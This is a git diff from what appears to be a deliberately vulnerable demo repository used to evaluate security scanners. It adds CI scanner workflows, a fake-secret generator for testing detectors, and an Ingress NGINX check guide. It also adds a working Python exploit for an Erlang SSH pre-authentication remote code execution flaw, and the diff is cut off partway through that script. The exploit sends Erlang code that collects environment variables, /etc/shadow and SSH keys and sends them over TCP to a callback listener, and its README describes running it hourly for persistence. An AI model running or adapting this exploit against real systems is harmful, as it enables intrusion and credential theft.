diff --git a/.dryrunsecurity.yaml b/.dryrunsecurity.yaml new file mode 100644 index 0000000..d3c7ab0 --- /dev/null +++ b/.dryrunsecurity.yaml @@ -0,0 +1,11 @@ +sensitiveCodepaths: + # Files only allowed authors can modify + # - 'app.js' + # - 'controllers/**/*.js' +allowedAuthors: + usernames: + - 'confusedcrib' +notificationList: + # GitHub username or team name + # - '@DryRunSec/security' + # - '@john-doe' diff --git a/.github/workflows/LAST.yml b/.github/workflows/LAST.yml deleted file mode 100644 index 8c5b8f7..0000000 --- a/.github/workflows/LAST.yml +++ /dev/null @@ -1,34 +0,0 @@ -name: LAST - -on: - pull_request: - types: [opened, synchronize, reopened] - -jobs: - LAST-Scan: - runs-on: ubuntu-latest - steps: - - - uses: actions/checkout@v3 - with: - fetch-depth: 0 # Fetch all history for all branches and tags - ref: ${{ github.head_ref }} - - - name: Fetch target branch - run: git fetch origin ${{ github.base_ref }}:${{ github.base_ref }} - - - name: Set up Python 3.12 - uses: actions/setup-python@v3 - with: - python-version: 3.12 - - - name: Install dependencies - run: | - python -m pip install --upgrade pip - pip install latio - - - name: Analyzing the code with LAST - env: - OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }} - run: | - latio partial-github . ${{ github.base_ref }} ${{ github.head_ref }} diff --git a/.github/workflows/amplify.yml b/.github/workflows/amplify.yml new file mode 100644 index 0000000..69a6744 --- /dev/null +++ b/.github/workflows/amplify.yml @@ -0,0 +1,22 @@ +--- +name: Amplify Security +on: + pull_request: {} + workflow_dispatch: {} + push: + branches: ["master", "main"] + +permissions: + contents: read + id-token: write + +jobs: + amplify-security-scan: + name: Amplify Security Scan + runs-on: ubuntu-latest + if: (!github.event.pull_request.head.repo.fork && github.actor != 'dependabot[bot]') + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Amplify Runner + uses: amplify-security/runner-action@main diff --git a/.github/workflows/backslash.yml b/.github/workflows/backslash.yml new file mode 100644 index 0000000..5307f66 --- /dev/null +++ b/.github/workflows/backslash.yml @@ -0,0 +1,21 @@ +name: 'CI | Backslash scan' + +on: + workflow_dispatch: + pull_request: + branches: + - main + +env: + API_KEY: ${{ secrets.BACKSLASH_API_KEY }} + +jobs: + backslash-scan: + name: Scaning + runs-on: ubuntu-latest + steps: + - name: Backslash scan step + uses: backslash-security/scan-action@main + with: + authToken: ${{ env.API_KEY }} + prScan: true diff --git a/.github/workflows/base64-secrets-checker.yml b/.github/workflows/base64-secrets-checker.yml new file mode 100644 index 0000000..6ee4498 --- /dev/null +++ b/.github/workflows/base64-secrets-checker.yml @@ -0,0 +1,251 @@ +name: Generate Fake Secrets for Testing + +on: + workflow_dispatch: # Allow manual triggering + +jobs: + generate-fake-secrets: + runs-on: ubuntu-latest + steps: + - name: Generate GitHub Tokens + run: | + echo "::group::GitHub Tokens (Base64 Encoded)" + + # Generate fake GitHub personal access token + FAKE_GH_TOKEN="ghp_$(openssl rand -hex 20)" + echo "Fake GitHub PAT: $FAKE_GH_TOKEN" + echo "Base64 encoded: $(echo -n "$FAKE_GH_TOKEN" | base64)" + echo "Double encoded: $(echo -n "$FAKE_GH_TOKEN" | base64 | base64)" + + # Generate fake GitHub OAuth token + FAKE_GH_OAUTH="gho_$(openssl rand -hex 20)" + echo "Fake GitHub OAuth: $FAKE_GH_OAUTH" + echo "Base64 encoded: $(echo -n "$FAKE_GH_OAUTH" | base64)" + + # Generate fake GitHub user-to-server token + FAKE_GH_USER="ghu_$(openssl rand -hex 20)" + echo "Fake GitHub User Token: $FAKE_GH_USER" + echo "Base64 encoded: $(echo -n "$FAKE_GH_USER" | base64)" + + # Generate fake GitHub server-to-server token + FAKE_GH_SERVER="ghs_$(openssl rand -hex 20)" + echo "Fake GitHub Server Token: $FAKE_GH_SERVER" + echo "Base64 encoded: $(echo -n "$FAKE_GH_SERVER" | base64)" + + # Generate fake GitHub refresh token + FAKE_GH_REFRESH="ghr_$(openssl rand -hex 20)" + echo "Fake GitHub Refresh Token: $FAKE_GH_REFRESH" + echo "Base64 encoded: $(echo -n "$FAKE_GH_REFRESH" | base64)" + + echo "::endgroup::" + + - name: Generate AWS Credentials + run: | + echo "::group::AWS Credentials (Base64 Encoded)" + + # Generate fake AWS access key + FAKE_AWS_KEY="AKIA$(openssl rand -hex 8 | tr '[:lower:]' '[:upper:]')" + FAKE_AWS_SECRET="$(openssl rand -base64 30)" + + echo "Fake AWS Access Key: $FAKE_AWS_KEY" + echo "Base64 encoded: $(echo -n "$FAKE_AWS_KEY" | base64)" + + echo "Fake AWS Secret: $FAKE_AWS_SECRET" + echo "Base64 encoded: $(echo -n "$FAKE_AWS_SECRET" | base64)" + + # Create a JSON with credentials and encode it + AWS_CREDS=$(cat </dev/null + + PRIVATE_KEY=$(cat key.pem) + CERTIFICATE=$(cat cert.pem) + + echo "RSA Private Key, Base64 encoded:" + cat key.pem | base64 + + echo "Certificate, Base64 encoded:" + cat cert.pem | base64 + + # Generate SSH key and encode it + ssh-keygen -t rsa -b 2048 -f id_rsa -N "" -q + + echo "SSH Private Key, Base64 encoded:" + cat id_rsa | base64 + + echo "::endgroup::" + + - name: Generate Database Connection Strings + run: | + echo "::group::Database Connection Strings (Base64 Encoded)" + + # Generate fake PostgreSQL connection string + FAKE_PG_CONN="postgresql://user:$(openssl rand -hex 8)@database.example.com:5432/db_name" + echo "Fake PostgreSQL Connection: $FAKE_PG_CONN" + echo "Base64 encoded: $(echo -n "$FAKE_PG_CONN" | base64)" + + # Generate fake MySQL connection string + FAKE_MYSQL_CONN="mysql://admin:$(openssl rand -hex 8)@mysql.example.com/database" + echo "Fake MySQL Connection: $FAKE_MYSQL_CONN" + echo "Base64 encoded: $(echo -n "$FAKE_MYSQL_CONN" | base64)" + + # Generate fake MongoDB connection string + FAKE_MONGO_CONN="mongodb+srv://user:$(openssl rand -hex 10)@cluster0.mongodb.net/test?retryWrites=true&w=majority" + echo "Fake MongoDB Connection: $FAKE_MONGO_CONN" + echo "Base64 encoded: $(echo -n "$FAKE_MONGO_CONN" | base64)" + + echo "::endgroup::" + + - name: Generate JWT Tokens + run: | + echo "::group::JWT Tokens (Base64 Encoded)" + + # Create fake JWT header + JWT_HEADER='{"alg":"HS256","typ":"JWT"}' + # Create fake JWT payload with various claims + JWT_PAYLOAD=$(cat < multi-secret.txt << EOF + This file contains multiple secrets in one file. + + GitHub token: ghp_$(openssl rand -hex 20) + + Base64 encoded AWS key: $(echo -n "AKIA$(openssl rand -hex 8 | tr '[:lower:]' '[:upper:]')" | base64) + + Configuration file content: + { + "apiKey": "$(openssl rand -hex 16)", + "githubToken": "$(echo -n "gho_$(openssl rand -hex 20)" | base64)", + "database": { + "user": "admin", + "password": "$(openssl rand -base64 12)" + } + } + EOF + + echo "File with multiple secrets, Base64 encoded:" + cat multi-secret.txt | base64 + + echo "::endgroup::" + + - name: Embed Secrets in Different File Formats + run: | + echo "::group::Secrets in Different Formats" + + # Create a fake environment file (.env) + cat > .env.fake << EOF + # API Configuration + API_KEY=$(openssl rand -hex 16) + API_SECRET=$(openssl rand -base64 24) + + # GitHub Access + GITHUB_TOKEN=gho_$(openssl rand -hex 20) + + # Database + DB_PASSWORD=$(openssl rand -base64 16) + MONGO_URI=mongodb+srv://admin:$(openssl rand -hex 12)@example.mongodb.net/database + EOF + + echo "Fake .env file, Base64 encoded:" + cat .env.fake | base64 + + # Create a fake YAML config + cat > config.yaml << EOF + apiVersion: v1 + kind: Secret + metadata: + name: app-secrets + data: + api_key: $(echo -n "$(openssl rand -hex 16)" | base64) + github_token: $(echo -n "ghp_$(openssl rand -hex 20)" | base64) + jwt_secret: $(openssl rand -base64 32) + EOF + + echo "Fake YAML config, Base64 encoded:" + cat config.yaml | base64 + + echo "::endgroup::" + + - name: Generate Outputs Summary + run: | + echo "## Secret Detection Test Data" >> $GITHUB_STEP_SUMMARY + echo "This workflow has generated various fake secrets for testing your detection tool." >> $GITHUB_STEP_SUMMARY + echo "" >> $GITHUB_STEP_SUMMARY + echo "✅ Generated GitHub tokens (PAT, OAuth, etc.)" >> $GITHUB_STEP_SUMMARY + echo "✅ Generated AWS credentials" >> $GITHUB_STEP_SUMMARY + echo "✅ Generated API keys" >> $GITHUB_STEP_SUMMARY + echo "✅ Generated private keys and certificates" >> $GITHUB_STEP_SUMMARY + echo "✅ Generated database connection strings" >> $GITHUB_STEP_SUMMARY + echo "✅ Generated JWT tokens" >> $GITHUB_STEP_SUMMARY + echo "✅ Generated combined secrets in various formats" >> $GITHUB_STEP_SUMMARY + echo "" >> $GITHUB_STEP_SUMMARY + echo "All of these have been output to the workflow logs in base64 encoded format." >> $GITHUB_STEP_SUMMARY diff --git a/.github/workflows/pixee.yml b/.github/workflows/pixee.yml new file mode 100644 index 0000000..6941512 --- /dev/null +++ b/.github/workflows/pixee.yml @@ -0,0 +1,28 @@ +name: Snyk Analysis + +on: + workflow_dispatch: + push: + +permissions: + contents: read + id-token: write + +jobs: + snyk: + name: Pixee Snyk Analysis + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: snyk/actions/setup@0.4.0 + - name: Run Snyk Code + run: snyk code test --org=personal-S75uTmrVsW9D2mctWJPs9d --sarif-file-output=pixee-snyk.sarif.json + continue-on-error: true + env: + SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} + - name: Remediate Snyk Findings with Pixee + uses: pixee/upload-tool-results-action@v2 + with: + tool: snyk + file: pixee-snyk.sarif.json + pixee-api-url: "https://latio.getpixee.com" \ No newline at end of file diff --git a/.github/workflows/publish-insecure.yml b/.github/workflows/publish-insecure.yml index 40c5634..40e32a9 100644 --- a/.github/workflows/publish-insecure.yml +++ b/.github/workflows/publish-insecure.yml @@ -1,92 +1,70 @@ -# This workflow uses actions that are not certified by GitHub. -# They are provided by a third-party and are governed by -# separate terms of service, privacy policy, and support -# documentation. - -# GitHub recommends pinning actions to a commit SHA. -# To get a newer version, you will need to update the SHA. -# You can also reference a tag or branch, but the action may change without warning. - name: Publish Docker images on: release: types: [published] + schedule: + - cron: '0 0 * * *' # Nightly builds + workflow_dispatch: # Manually trigger a workflow run jobs: push_to_registry: name: Push Docker images to Docker Hub runs-on: ubuntu-latest + + strategy: + matrix: + image-data: + - name: insecure-app + image: confusedcrib/insecure-app + context: ./insecure-app + dockerfile: ./insecure-app/Dockerfile + - name: insecure-java + image: confusedcrib/insecure-java + context: ./insecure-java + dockerfile: ./insecure-java/Dockerfile + - name: insecure-js + image: confusedcrib/insecure-js + context: ./insecure-js + dockerfile: ./insecure-js/Dockerfile + - name: workload-security-evaluator + image: confusedcrib/workload-security-evaluator + context: ./workload-security-evaluator + dockerfile: ./workload-security-evaluator/Dockerfile + - name: insecure-api + image: confusedcrib/insecure-api + context: ./insecure-api + dockerfile: ./insecure-api/Dockerfile + - name: insecure-ai + image: confusedcrib/insecure-ai + context: ./insecure-ai + dockerfile: ./insecure-ai/Dockerfile + steps: - name: Check out the repo uses: actions/checkout@v4 - name: Log in to Docker Hub - uses: docker/login-action@f4ef78c080cd8ba55a85445d5b36e214a81df20a + uses: docker/login-action@v2 with: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_PASSWORD }} - # Build and push insecure-app Docker image - - name: Extract metadata for insecure-app - id: meta-app - uses: docker/metadata-action@9ec57ed1fcdbf14dcef7dfbe97b2010124a938b7 - with: - images: confusedcrib/insecure-app - - - name: Build and push insecure-app Docker image - uses: docker/build-push-action@3b5e8027fcad23fda98b2e3ac259d8d67585f671 - with: - context: . - file: ./insecure-app/Dockerfile - push: true - tags: ${{ steps.meta-app.outputs.tags }} - labels: ${{ steps.meta-app.outputs.labels }} - - # Build and push insecure-java Docker image - - name: Extract metadata for insecure-java - id: meta-java - uses: docker/metadata-action@9ec57ed1fcdbf14dcef7dfbe97b2010124a938b7 - with: - images: confusedcrib/insecure-java - - - name: Build and push insecure-java Docker image - uses: docker/build-push-action@3b5e8027fcad23fda98b2e3ac259d8d67585f671 - with: - context: . - file: ./insecure-java/Dockerfile - push: true - tags: ${{ steps.meta-java.outputs.tags }} - labels: ${{ steps.meta-java.outputs.labels }} - - # Build and push insecure-js Docker image - - name: Extract metadata for insecure-js - id: meta-js - uses: docker/metadata-action@9ec57ed1fcdbf14dcef7dfbe97b2010124a938b7 - with: - images: confusedcrib/insecure-js - - - name: Build and push insecure-js Docker image - uses: docker/build-push-action@3b5e8027fcad23fda98b2e3ac259d8d67585f671 - with: - context: . - file: ./insecure-js/Dockerfile - push: true - tags: ${{ steps.meta-js.outputs.tags }} - labels: ${{ steps.meta-js.outputs.labels }} - - # Build and push workload-security Docker image - - name: Extract metadata for insecure-java - id: meta-wse - uses: docker/metadata-action@9ec57ed1fcdbf14dcef7dfbe97b2010124a938b7 + - name: Extract metadata for ${{ matrix.image-data.name }} + id: meta + uses: docker/metadata-action@v4 with: - images: confusedcrib/workload-security-evaluator + images: ${{ matrix.image-data.image }} + tags: | + type=raw,value=latest + type=schedule,pattern=nightly + type=semver,pattern={{version}} - - name: Build and push insecure-java Docker image - uses: docker/build-push-action@3b5e8027fcad23fda98b2e3ac259d8d67585f671 + - name: Build and push ${{ matrix.image-data.name }} Docker image + uses: docker/build-push-action@v4 with: - context: . - file: ./workload-security-evaluator/Dockerfile + context: ${{ matrix.image-data.context }} + file: ${{ matrix.image-data.dockerfile }} push: true - tags: ${{ steps.meta-wse.outputs.tags }} - labels: ${{ steps.meta-wse.outputs.labels }} \ No newline at end of file + tags: ${{ steps.meta.outputs.tags }} + labels: ${{ steps.meta.outputs.labels }} diff --git a/.github/workflows/soos.yml b/.github/workflows/soos.yml new file mode 100644 index 0000000..bd27073 --- /dev/null +++ b/.github/workflows/soos.yml @@ -0,0 +1,85 @@ +on: [push] + +jobs: + soos-security-scans: + name: SOOS Security Scans + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@master + + - name: Set up Python + uses: actions/setup-python@v5 + with: + python-version: '3.12' + +# - name: Install Dependencies +# run: | +# python -m pip install --upgrade pip +# python -m pip install cyclonedx-bom +# +# - name: Generate CycloneDX SBOM +# run: | +# FIRST_REQ=$(find . -name "requirements.txt" -type f | head -n 1) +# if [ -n "$FIRST_REQ" ]; then +# DIR=$(dirname "$FIRST_REQ") +# echo "Generating BOM from $FIRST_REQ..." +# cd "$DIR" +# cyclonedx-py requirements -i "requirements.txt" -o "../bom.cdx.json" +# cd - > /dev/null +# else +# echo "No requirements.txt found" +# exit 1 +# fi +# +# - name: Run SOOS SBOM Scan +# uses: soos-io/soos-sbom-github-action@v1 +# with: +# client_id: ${{ secrets.SOOS_CLIENT_ID }} +# api_key: ${{ secrets.SOOS_API_KEY }} +# project_name: ${{ github.event.repository.name }} +# sbom_path: "bom.cdx.json" +# persist_credentials: false + + - name: Install OpenGrep + run: | + curl -L https://github.com/opengrep/opengrep/releases/download/v1.1.2/opengrep_manylinux_x86 -o opengrep + chmod +x opengrep + sudo mv opengrep /usr/local/bin/ + + - name: Run OpenGrep Scan + run: | + opengrep scan --verbose --config=p/default --config=p/owasp-top-ten --config=p/cwe-top-25 --sarif --sarif-output=opengrep.sarif.json . + + - name: Run SOOS SCA Scan + uses: soos-io/soos-sca-github-action@v2 + with: + client_id: ${{ secrets.SOOS_CLIENT_ID }} + api_key: ${{ secrets.SOOS_API_KEY }} + project_name: ${{ github.event.repository.name }} + persist_credentials: false + + - name: Run SOOS DAST Scan + uses: soos-io/soos-dast-github-action@v2 + with: + client_id: ${{ secrets.SOOS_CLIENT_ID }} + api_key: ${{ secrets.SOOS_API_KEY }} + project_name: ${{ github.event.repository.name }} + target_url: https://latio.tech + persist_credentials: false + + - name: Run SOOS CSA Analysis + uses: soos-io/soos-csa-github-action@v1 + with: + client_id: ${{ secrets.SOOS_CLIENT_ID }} + api_key: ${{ secrets.SOOS_API_KEY }} + project_name: ${{ github.event.repository.name }} + target_image: confusedcrib/insecure-ai:latest + persist_credentials: false + + - name: Run SOOS SAST Scan + uses: soos-io/soos-sast-github-action@v1 + with: + client_id: ${{ secrets.SOOS_CLIENT_ID }} + api_key: ${{ secrets.SOOS_API_KEY }} + project_name: ${{ github.event.repository.name }} + persist_credentials: false \ No newline at end of file diff --git a/.gitignore b/.gitignore index 19ff220..3ca5b33 100644 --- a/.gitignore +++ b/.gitignore @@ -7,8 +7,8 @@ __pycache__/ *.egg *.log *.pot -*.db *.sqlite +*.dccache # Dist directory used for packaging dist/ @@ -64,3 +64,14 @@ terraform/.terraform.lock.hcl terraform/.terraform.tfstate.lock.info node_modules node_modules + +# Terraform +*.tfvars +*.tfvars.json +.terraform/ +*.tfstate +*.tfstate.* + + +#Ignore cursor AI rules +.cursor/rules/codacy.mdc diff --git a/docker-compose.yml b/docker-compose.yml new file mode 100644 index 0000000..4f8cc49 --- /dev/null +++ b/docker-compose.yml @@ -0,0 +1,51 @@ +version: '3.8' + +services: + insecure-app: + build: + context: ./insecure-app + dockerfile: Dockerfile + image: confusedcrib/insecure-app:latest + ports: + - "8080:8080" # Changed from 5000 to match README + volumes: + - /var/run/docker.sock:/var/run/docker.sock # Needed if app interacts with Docker + + insecure-java: + build: + context: ./insecure-java + dockerfile: Dockerfile + image: confusedcrib/insecure-java:latest + ports: + - "8081:8080" # Changed host port to 8081, container still uses 8080 + + insecure-js: + build: + context: ./insecure-js + dockerfile: Dockerfile + image: confusedcrib/insecure-js:latest + ports: + - "3000:3000" # Node.js app port + environment: + - NODE_ENV=development + + insecure-api: + build: + context: ./insecure-api + dockerfile: Dockerfile + image: confusedcrib/insecure-api:latest + ports: + - "8000:8000" # FastAPI/Uvicorn port + environment: + - PYTHONUNBUFFERED=1 + + workload-security-evaluator: + build: + context: ./workload-security-evaluator + dockerfile: Dockerfile + image: confusedcrib/workload-security-evaluator:latest + +networks: + default: + name: insecure-network + driver: bridge \ No newline at end of file diff --git a/exploits/CVE-2025-1974.md b/exploits/CVE-2025-1974.md new file mode 100644 index 0000000..1c1f08a --- /dev/null +++ b/exploits/CVE-2025-1974.md @@ -0,0 +1,38 @@ +# 🚨 Ingress NGINX Admission Controller Exposure Check + +Want to check if your Ingress NGINX is vulnerable? Here's how to do it step by step! 🕵️‍♂️ + +## 🔍 Prerequisites Check + +1. **Check if you're using Ingress NGINX** +```bash +kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx +``` + +2. **Check your version** +```bash +kubectl -n ingress-nginx get deploy ingress-nginx-controller -o jsonpath="{.spec.template.spec.containers[0].image}" +``` + +3. **Get your ingress-nginx-controller IP** +```bash +kubectl -n ingress-nginx get svc ingress-nginx-controller -o jsonpath="{.spec.clusterIP}" +``` + +## 🎯 Testing for Vulnerability + +### From inside the ingress-nginx pod: +```bash +nuclei -u https://localhost:8443 -t ./nuclei-ingess.yaml +``` + +### From anywhere in the cluster: +Use the Kubernetes DNS name: +``` +ingress-nginx-controller.ingress-nginx.svc.cluster.local +``` + +## 📝 Notes +- The DNS name follows the pattern: `..svc.cluster.local` +- Replace `` with your service name (e.g., ingress-nginx-controller) +- Replace `` with your namespace (e.g., ingress-nginx) \ No newline at end of file diff --git a/exploits/CVE-2025-32433/README.md b/exploits/CVE-2025-32433/README.md new file mode 100644 index 0000000..74f67e7 --- /dev/null +++ b/exploits/CVE-2025-32433/README.md @@ -0,0 +1,62 @@ +# CVE-2025-32433: Erlang SSH Pre-Auth RCE Exploit + +This exploit targets a pre-authentication remote code execution vulnerability in the Erlang SSH server implementation. It allows attackers to execute arbitrary Erlang code without authentication. It's an extension of the work done here https://github.com/ProDefense/CVE-2025-32433 + +## Exploitation Steps + +1. Create the Erlang namespace in your Kubernetes cluster: + ```bash + kubectl create namespace erlang + ``` + +2. Deploy the vulnerable SSH server: + ```bash + cd ssh_server + ./deploy.sh + ``` + +3. Deploy the exploit that runs hourly: + ```bash + cd ssh_exploit + ./deploy.sh + ``` + +4. View the exfiltrated data: + ```bash + # List the exploit pod + kubectl get pods -n erlang -l app=ssh-exploit + + # Check exploit logs to see if data was captured + kubectl logs -n erlang -l app=ssh-exploit + + # Examine captured files in the pod + kubectl exec -it $(kubectl get pod -n erlang -l app=ssh-exploit -o name) -n erlang -- ls -la /app/captured_data + + # Read a specific captured file + kubectl exec -it $(kubectl get pod -n erlang -l app=ssh-exploit -o name) -n erlang -- cat /app/captured_data/env_vars_*.txt + ``` + +## Exploit Details + +The exploit performs the following actions: + +1. Discovers the SSH server service in the Kubernetes cluster +2. Establishes a connection to the vulnerable server +3. Sends specially crafted SSH packets to trigger the vulnerability +4. Executes Erlang code that: + - Collects environment variables + - Reads sensitive files like /etc/passwd, /etc/shadow + - Searches for SSH keys + - Gathers basic host information +5. Exfiltrates the data to the listener running in the exploit pod +6. Saves the data to the `/app/captured_data` directory + +The exploit runs hourly from a deployment in the same cluster, demonstrating how an attacker could maintain persistent access and regularly extract sensitive information. + +## Components + +- **ssh_server/**: Contains the vulnerable SSH server deployment +- **ssh_exploit/**: Contains the exploit code and deployment + - `CVE-2025-32433.py`: The main exploit script + - `listener.py`: TCP listener that receives exfiltrated data + - `exploit-deployment.yaml`: Kubernetes deployment for the exploit diff --git a/exploits/CVE-2025-32433/ssh_exploit/CVE-2025-32433.py b/exploits/CVE-2025-32433/ssh_exploit/CVE-2025-32433.py new file mode 100644 index 0000000..fab8103 --- /dev/null +++ b/exploits/CVE-2025-32433/ssh_exploit/CVE-2025-32433.py @@ -0,0 +1,285 @@ +import socket +import struct +import time +import os +import requests +import json +from kubernetes import client, config + +def discover_ssh_server(): + try: + print("[*] Attempting to load in-cluster Kubernetes config...") + config.load_incluster_config() + print("[+] Successfully loaded in-cluster config") + except Exception as e: + print(f"[!] Failed to load in-cluster config: {e}") + print("[*] Falling back to kubeconfig...") + try: + config.load_kube_config() + print("[+] Successfully loaded kubeconfig") + except Exception as e: + print(f"[!] Failed to load kubeconfig: {e}") + raise + + v1 = client.CoreV1Api() + + try: + print("[*] Looking up ssh-server service...") + service = v1.read_namespaced_service( + name="ssh-server", + namespace="erlang" + ) + print(f"[+] Found service: {service.metadata.name}") + print(f"[+] Service IP: {service.spec.cluster_ip}") + except Exception as e: + print(f"[!] Failed to get service details: {e}") + + try: + print("[*] Looking up ssh-server pods...") + pods = v1.list_namespaced_pod( + namespace="erlang", + label_selector="app=ssh-server" + ) + + if not pods.items: + print("[!] No SSH server pods found") + else: + print(f"[+] Found {len(pods.items)} pod(s)") + for pod in pods.items: + print(f"[+] Pod: {pod.metadata.name}") + print(f"[+] Pod IP: {pod.status.pod_ip}") + print(f"[+] Pod Status: {pod.status.phase}") + print(f"[+] Pod Conditions: {pod.status.conditions}") + except Exception as e: + print(f"[!] Failed to get pod details: {e}") + + # Return service name (for DNS) and pod IP as fallback + return { + "service_host": "ssh-server.erlang.svc.cluster.local", + "pod_ip": pods.items[0].status.pod_ip if pods.items else None, + "port": 2222 + } + +# Try to discover the server, fall back to env vars +try: + server_info = discover_ssh_server() + HOST = server_info["service_host"] + PORT = server_info["port"] + print(f"[*] Discovered SSH server at {HOST}:{PORT}") +except Exception as e: + print(f"[!] Failed to discover server: {e}") + print("[*] Falling back to environment variables") + HOST = os.environ.get("HOST", "127.0.0.1") + PORT = int(os.environ.get("PORT", "2222")) + +print(f"[*] Targeting {HOST}:{PORT}") + +# Add DNS resolution check +try: + print(f"[*] Attempting DNS resolution for {HOST}...") + resolved_ip = socket.gethostbyname(HOST) + print(f"[+] Successfully resolved {HOST} to {resolved_ip}") +except Exception as e: + print(f"[!] DNS resolution failed: {e}") + +# Add network connectivity check +try: + print(f"[*] Testing network connectivity to {HOST}:{PORT}...") + test_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + test_socket.settimeout(5) + test_socket.connect((HOST, PORT)) + test_socket.close() + print(f"[+] Successfully connected to {HOST}:{PORT}") +except Exception as e: + print(f"[!] Network connectivity test failed: {e}") + print("[!] Please check if the target service is running and accessible") + +# Helper to format SSH string (4-byte length + bytes) +def string_payload(s): + s_bytes = s.encode("utf-8") + return struct.pack(">I", len(s_bytes)) + s_bytes + + +# Builds SSH_MSG_CHANNEL_OPEN for session +def build_channel_open(channel_id=0): + return ( + b"\x5a" # SSH_MSG_CHANNEL_OPEN + + string_payload("session") + + struct.pack(">I", channel_id) # sender channel ID + + struct.pack(">I", 0x68000) # initial window size + + struct.pack(">I", 0x10000) # max packet size + ) + + +# Builds SSH_MSG_CHANNEL_REQUEST with 'exec' payload +def build_channel_request(channel_id=0, command=None): + if command is None: + command = 'file:write_file("/lab.txt", <<"gotcha">>).' + return ( + b"\x62" # SSH_MSG_CHANNEL_REQUEST + + struct.pack(">I", channel_id) + + string_payload("exec") + + b"\x01" # want_reply = true + + string_payload(command) + ) + + +# Builds a minimal but valid SSH_MSG_KEXINIT packet +def build_kexinit(): + cookie = b"\x00" * 16 + + def name_list(l): + return string_payload(",".join(l)) + + # Match server-supported algorithms from the log + return ( + b"\x14" + + cookie + + name_list( + [ + "curve25519-sha256", + "ecdh-sha2-nistp256", + "diffie-hellman-group-exchange-sha256", + "diffie-hellman-group14-sha256", + ] + ) # kex algorithms + + name_list(["rsa-sha2-256", "rsa-sha2-512"]) # host key algorithms + + name_list(["aes128-ctr"]) * 2 # encryption client->server, server->client + + name_list(["hmac-sha1"]) * 2 # MAC algorithms + + name_list(["none"]) * 2 # compression + + name_list([]) * 2 # languages + + b"\x00" + + struct.pack(">I", 0) # first_kex_packet_follows, reserved + ) + + +# Pads a packet to match SSH framing +def pad_packet(payload, block_size=8): + min_padding = 4 + padding_len = block_size - ((len(payload) + 5) % block_size) + if padding_len < min_padding: + padding_len += block_size + return ( + struct.pack(">I", len(payload) + 1 + padding_len) + + bytes([padding_len]) + + payload + + bytes([0] * padding_len) + ) + +# Build Erlang command to send environment variables and sensitive files to a listener +def build_env_exfil_command(callback_host, callback_port=8080): + # Command that will: + # 1. Gather environment variables + # 2. Read sensitive files + # 3. Send all data to our listener + return f''' + begin + % Get environment variables + EnvData = "== ENVIRONMENT VARIABLES ==\\n" ++ os:cmd("env") ++ "\\n\\n", + + % Read some sensitive files + EtcPasswd = case file:read_file("/etc/passwd") of + {{ok, PasswdBin}} -> "== /etc/passwd ==\\n" ++ binary_to_list(PasswdBin) ++ "\\n\\n"; + _ -> "== /etc/passwd ==\\nCould not read file\\n\\n" + end, + + EtcShadow = case file:read_file("/etc/shadow") of + {{ok, ShadowBin}} -> "== /etc/shadow ==\\n" ++ binary_to_list(ShadowBin) ++ "\\n\\n"; + _ -> "== /etc/shadow ==\\nCould not read file\\n\\n" + end, + + SshKeys = case os:cmd("find /home -name 'id_rsa' -o -name 'id_dsa' -o -name '*.pem' -o -name 'authorized_keys' 2>/dev/null | xargs cat 2>/dev/null") of + [] -> "== SSH KEYS ==\\nNo SSH keys found\\n\\n"; + Keys -> "== SSH KEYS ==\\n" ++ Keys ++ "\\n\\n" + end, + + % Additional info + HostInfo = "== HOST INFO ==\\n" ++ + "Hostname: " ++ os:cmd("hostname") ++ + "Kernel: " ++ os:cmd("uname -a") ++ "\\n\\n", + + % Combine all data + AllData = EnvData ++ HostInfo ++ EtcPasswd ++ EtcShadow ++ SshKeys, + + % Create a TCP connection to the listener + {{ok, Socket}} = gen_tcp:connect("{callback_host}", {callback_port}, [binary, {{packet, 0}}]), + + % Send the data + ok = gen_tcp:send(Socket, AllData), + + % Close the connection + gen_tcp:close(Socket), + + % Also write to file as backup + file:write_file("/env_vars.txt", list_to_binary(AllData)) + end. + ''' + +# === Exploit flow === +try: + # Get callback information from environment or use pod IP + CALLBACK_HOST = os.environ.get("CALLBACK_HOST", os.environ.get("POD_IP", "127.0.0.1")) + CALLBACK_PORT = int(os.environ.get("CALLBACK_PORT", "8080")) + + print(f"[*] Using callback address: {CALLBACK_HOST}:{CALLBACK_PORT}") + print(f"[*] Creating connection to {HOST}:{PORT}...") + + with socket.create_connection((HOST, PORT), timeout=10) as s: + print("[+] Connection established") + print("[*] Setting socket options...") + s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + s.settimeout(10) + + # 1. Banner exchange + print("[*] Sending SSH banner...") + s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n") + print("[+] Banner sent") + + try: + banner = s.recv(1024) + print(f"[+] Received banner: {banner.strip().decode(errors='ignore')}") + except socket.timeout: + print("[!] Timeout waiting for banner response") + except Exception as e: + print(f"[!] Error receiving banner: {e}") + + time.sleep(0.5) # Small delay between packets + + # 2. Send SSH_MSG_KEXINIT + print("[*] Sending SSH_MSG_KEXINIT...") + kex_packet = build_kexinit() + s.sendall(pad_packet(kex_packet)) + print("[+] KEXINIT sent") + time.sleep(0.5) # Small delay between packets + + # 3. Send SSH_MSG_CHANNEL_OPEN + print("[*] Sending SSH_MSG_CHANNEL_OPEN...") + chan_open = build_channel_open() + s.sendall(pad_packet(chan_open)) + print("[+] CHANNEL_OPEN sent") + time.sleep(0.5) # Small delay between packets + + # 4. Send SSH_MSG_CHANNEL_REQUEST (pre-auth!) with environment variable exfiltration command + env_exfil_cmd = build_env_exfil_command(CALLBACK_HOST, CALLBACK_PORT) + print(f"[*] Sending SSH_MSG_CHANNEL_REQUEST to exfiltrate data to {CALLBACK_HOST}:{CALLBACK_PORT}...") + chan_req = build_channel_request(command=env_exfil_cmd) + s.sendall(pad_packet(chan_req)) + print("[+] CHANNEL_REQUEST sent") + + print(f"[✓] Exploit sent! If the server is vulnerable, it should attempt to connect back to {CALLBACK_HOST}:{CALLBACK_PORT}") + + # Try to receive any response (might get a protocol error or disconnect) + try: + print("[*] Waiting for response...") + response = s.recv(1024) + print(f"[+] Received response: {response.hex()}") + except socket.timeout: + print("[*] No response within timeout period (which is expected)") + except Exception as e: + print(f"[!] Error receiving 